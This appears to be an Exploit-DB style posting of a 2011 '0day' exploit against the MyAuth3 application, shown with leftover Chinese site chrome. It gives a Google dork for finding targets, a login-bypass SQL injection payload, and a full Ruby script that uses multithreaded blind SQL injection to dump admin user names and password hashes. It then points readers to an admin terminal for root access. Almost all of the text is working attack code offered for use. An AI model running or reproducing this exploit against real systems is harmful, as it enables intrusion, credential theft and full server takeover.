扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 |
# Exploit Title: MyAuth3 Blind SQL Injection / Root Shell Access 0day exploit # Google Dork: allinurl:1881/?console=panel # Date: 09/06/2011 # Author: Marcio Almeida (marcio[at]alligatorteam[dot] org | @marcioalm) # Version: 3.0 # Tested on: Linux #EDB-Note: apparently no true exploit is needed to dump system pwd hashes, because the admin myauth users have the ability to run a terminal session --------------- PoC (POST data) --------------- URL: http://localhost:1881/index.php?console=panel POST Data (Authentication bypass): panel_cmd=auth&r=ok&user=alligatorteam&pass=' or 1=1# --------------- This application has a accessible root shell in the admin interface located at: http://localhost:1881/admin/ When you access it, just go to tools / terminal menu and g0t r00t! The following code will manage all the dirty work for you! enjoy ;-) ############## EXPLOIT CODE [myauth3_xpl.rb] ################## require "net/http" require "net/https" require "erb" require "singleton" require 'uri' sql = "select concat(user,0x20,pass) from admusers where enable = 1 and accesslevel >= 20" @target = ARGV[0] numthreads = ARGV[1] @verbose = ARGV[2] @cookie = "" puts "+=============================================================================+" puts "| MyAuth 3 - Blind SQL Injection / Root Shell Access 0day exploit |" puts "| Google Dork: allinurl:1881/?console=panel |" puts "| author: Marcio Almeida (marcio@alligatorteam.org) |" puts "| |" puts "| by Alligator Security Team| irc://irc.freenode.net:8001/#Alligator|" puts "| twitter: @alligatorteam |" puts "+=============================================================================+" puts if (ARGV[0].nil? || ARGV[1].nil?) puts "usage (non verbose): ruby -W0 #{__FILE__} address num_threads" puts "usage (verbose): ruby -W0 #{__FILE__} address num_threads -v" puts "-----------------------------------------------------------" puts "Example 1: ruby -W0 #{__FILE__} 127.0.0.1 5" puts "Example 2: ruby -W0 #{__FILE__} www.vulnsite.com.br 5 -v" exit(0) end def requisicao(posicao,p_substr,sql) useragent = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1' @http = Net::HTTP.new(@target, 1881) # @http.use_ssl = true parametro = "panel_cmd=auth&r=ok&user=alligatorteam&pass=' or #{posicao} >= ascii(substr((#{sql}),#{p_substr.to_s},1))#" begin resp, data = @http.post2("/index.php?console=panel", parametro, {'User-Agent' => useragent, 'Cookie' => @cookie.to_s }) resultado = data.match(/Financeiro/) rescue Exception=>e puts e end if resultado.nil? return false else return true end end def busca_r( menor, maior, p_substr,sql ) return -1 if menor > maior return maior if (maior-menor)==1 posicao = (menor+maior)/2 if (requisicao(posicao,p_substr,sql)) busca_r( menor, posicao, p_substr,sql ) else busca_r( posicao, maior,p_substr,sql ) end end def busca_sql(inicio, qtdThreads, sql, str_final) resultado = 0 while (resultado != 1) do str_final[inicio] = "" resultado = busca_r(0,255,inicio,sql) if resultado != 1 if @verbose == "-v" puts inicio.to_s+") Character Found: "+resultado.to_s+" - "+resultado.chr.to_s end str_final[inicio] += resultado.chr.to_s inicio = inicio + qtdThreads.to_i end end end def busca_com_threads(sql, numthreads) str_final = [] threads = [] count = 1 numthreads.to_i.times{|i| threads << Thread.new { busca_sql(count, numthreads, sql, str_final) } count += 1 } threads.each do |t| t.join end puts str_final.to_s end puts "When you crack any of the following hashes, go to http://"+ @target + ":1881/admin to login into the application." puts "Then go to tools / terminal menu and get a r00t shell access ;-)" puts "==========================================================================" puts "[+] admusers table dumping... (maybe it'll take a little bit of time...)" puts "==========================================================================" 100.times { |i| busca_com_threads(sql+" limit 1 offset " + i.to_s, numthreads) } |
体验盒子
